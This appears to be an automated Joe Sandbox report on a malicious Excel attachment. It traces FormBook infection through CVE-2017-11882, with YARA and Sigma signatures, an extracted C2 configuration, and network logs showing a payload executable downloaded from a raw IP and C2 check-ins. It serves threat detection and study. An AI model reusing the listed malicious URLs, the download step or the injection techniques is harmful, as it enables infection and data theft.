Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ_Order_PO_TAE5203E.xlsx

Overview

General Information

Sample Name:RFQ_Order_PO_TAE5203E.xlsx
Analysis ID:552838
MD5:552f043a7c752ec7e8dddbdf0b36c4d8
SHA1:cfb4a5bea12cab9a47d3ff1ee1210d444b9a92a4
SHA256:e7a5f1c37a043773027f4937afb63d3178362113132066c7435b6d716eda6cf2
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Found hidden mapped module (file has been removed from disk)
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2648 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1960 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2240 cmdline: "C:\Users\Public\vbc.exe" MD5: A21C93294EF3770C5C728A1B2D82FB92)
      • vbc.exe (PID: 2124 cmdline: C:\Users\Public\vbc.exe MD5: A21C93294EF3770C5C728A1B2D82FB92)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msiexec.exe (PID: 2036 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 2640 cmdline: /c del "C:\Users\Public\vbc.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\Cielert.tmpJoeSecurity_FormBookYara detected FormBookJoe Security
    C:\Users\user\AppData\Local\Temp\Cielert.tmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    C:\Users\user\AppData\Local\Temp\Cielert.tmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
      • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
      • 0x6b18:$sqlite3text: 68 38 2A 90 C5
      • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
      • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
      00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 28 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
          • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
          • 0x15d18:$sqlite3text: 68 38 2A 90 C5
          • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
          • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
          5.0.vbc.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            5.0.vbc.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 209.141.37.110, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1960, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1960, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1960, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2240
            Sigma detected: Execution from Suspicious FolderShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Users\Public\vbc.exe" , CommandLine: "C:\Users\Public\vbc.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1960, ProcessCommandLine: "C:\Users\Public\vbc.exe" , ProcessId: 2240

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.dreamschools.online/b80i/"], "decoy": ["yixuan5.com", "jiazheng369.com", "danielleefelipe.net", "micorgas.com", "uvywah.com", "nbjcgl.com", "streets4suites.com", "hempgotas.com", "postmoon.xyz", "gaboshoes.com", "pastodwes.com", "libes.asia", "damusalama.com", "youngliving1.com", "mollyagee.com", "branchwallet.com", "seebuehnegoerlitz.com", "inventors.community", "teentykarm.quest", "927291.com", "wohn-union.info", "rvmservices.com", "cuanquotex.online", "buysubarus.com", "360e.group", "markham.condos", "carriewilliamsinc.com", "ennitec.com", "wildberryhair.com", "trulyrun.com", "pinkandgrey.info", "mnselfservice.com", "gabtomenice.com", "2thpolis.com", "standardcrypro.com", "58lif.com", "ir-hasnol.com", "ggsega.xyz", "tipslowclever.rest", "atlasgrpltdgh.com", "4338agnes.com", "hillsncreeks.com", "pentest.ink", "cevichiles.com", "evodoge.com", "gooooooo.xyz", "ehaszthecarpetbagger.com", "finanes.xyz", "zoharfine.com", "viperiastudios.com", "sjljtzsls.com", "frentags.art", "mediafyagency.com", "faydergayremezdayener.net", "freelance-rse.com", "quickmovecourierservices.com", "lexingtonprochoice.com", "farmacymerchants.com", "inkland-tattoo.com", "aloebiotics.com", "rampi6.com", "bookinggroningen.com", "wilkinsutotint.com", "inslidr.com"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: RFQ_Order_PO_TAE5203E.xlsxVirustotal: Detection: 35%Perma Link
            Source: RFQ_Order_PO_TAE5203E.xlsxReversingLabs: Detection: 34%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.552022647.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560670130.00000000002F0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.545422441.0000000009317000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.524809479.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698410685.00000000008D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560797840.0000000000430000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.525559537.000000000060D000.00000004.00000020.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698075254.00000000000D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.560772297.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.698230838.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.525124582.0000000000401000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Cielert.tmp, type: DROPPED
            Antivirus detection for URL or domainShow sources
            Source: http://209.141.37.110/hnmy.exeAvira URL Cloud: Label: malware
            Source: http://www.aloebiotics.com/b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4vAvira URL Cloud: Label: malware
            Source: www.dreamschools.online/b80i/Avira URL Cloud: Label: phishing
            Source: http://www.sjljtzsls.com/b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4vAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: http://209.141.37.110/hnmy.exeVirustotal: Detection: 12%Perma Link
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmpAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
            Source: C:\Users\Public\vbc.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen3
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen3
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exeMetadefender: Detection: 31%Perma Link
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exeReversingLabs: Detection: 60%
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmpMetadefender: Detection: 50%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\Cielert.tmpReversingLabs: Detection: 89%
            Source: C:\Users\Public\vbc.exeMetadefender: Detection: 31%Perma Link
            Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 60%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hnmy[1].exeJoe Sandbox ML: detected
            Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 4.0.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
            Source: 4.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
            Source: 5.0.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: 5.0.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
            Source: 8.2.msiexec.exe.2b5796c.6.unpackAvira: Label: TR/Patched.Gen
            Source: 4.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen3
            Source: 4.1.vbc.exe.2130000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen3
            Source: 5.0.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: msiexec.pdb source: vbc.exe, 00000005.00000002.560819872.0000000000460000.00000040.00020000.sdmp, vbc.exe, 00000005.00000002.560884485.00000000004EA000.00000004.00000020.sdmp, vbc.exe, 00000005.00000002.560868156.00000000004D9000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.560943288.0000000000750000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.526246673.00000000005C0000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.561680130.00000000008D0000.00000040.00000001.sdmp, vbc.exe, 00000005.00000003.525339285.00000000002B0000.00000004.00000001.sdmp, msiexec.exe
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00437A5E __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,
            Source: global trafficDNS query: name: www.aloebiotics.com
            Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 209.141.37.110:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 209.141.37.110:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 163.197.71.43:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 163.197.71.43 80
            Source: C:\Windows\explorer.exeDomain query: www.mediafyagency.com
            Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
            Source: C:\Windows\explorer.exeDomain query: www.aloebiotics.com
            Source: C:\Windows\explorer.exeDomain query: www.sjljtzsls.com
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.dreamschools.online/b80i/
            Source: Joe Sandbox ViewASN Name: PONYNETUS PONYNETUS
            Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
            Source: global trafficHTTP traffic detected: GET /b80i/?XXAT9NU=u8CFGDbLa+paDYPUt2HIfZvLGaLNzu7WkG1ejV9QOUI0TwLOmLGNbUmrlgsvnY/sa5UfOA==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.aloebiotics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /b80i/?XXAT9NU=S1GZrcUjP6Mqu1rkaE68XUwdav2ZAuLdhfc3NoUcKUpIPYlLOeb3MkcjdHuyJHfoxw3F9Q==&bFQL=2dJLx4-Hc4v HTTP/1.1Host: www.sjljtzsls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 11 Jan 2022 22:12:56 GMTAccept-Ranges: bytesETag: "109cc962387d81:0"Server: Microsoft-IIS/8.5Date: Fri, 14 Jan 2022 03:08:59 GMTContent-Length: 598016Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 89 b6 f8 aa cd d7 96 f9 cd d7 96 f9 cd d7 96 f9 9b c8 85 f9 e8 d7 96 f9 cd d7 96 f9 f5 d7 96 f9 af c8 85 f9 de d7 96 f9 cd d7 97 f9 06 d6 96 f9 4e cb 98 f9 d6 d7 96 f9 25 c8 9c f9 46 d7 96 f9 25 c8 9d f9 ab d7 96 f9 75 d1 90 f9 cc d7 96 f9 52 69 63 68 cd d7 96 f9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 74 9f 46 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 e0 03 00 00 30 05 00 00 00 00 00 35 5a 02 00 00 10 00 00 00 f0 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 70 09 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 41 05 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 35 f0 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6d d7 03 00 00 10 00 00 00 e0 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 6c 01 00 00 f0 03 00 00 70 01 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 a3 00 00 00 60 05 00 00 60 00 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 e8 cc 00 00 00 10 06 00 00 d0 00 00 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 64 61 74 61 00 00 a5 8e 02 00 00 e0 06 00 00 90 02 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: global trafficHTTP traffic detected: GET /hnmy.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 209.141.37.110Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
            Source: unknownTCP traffic detected without corresponding DNS query: 209.141.37.110
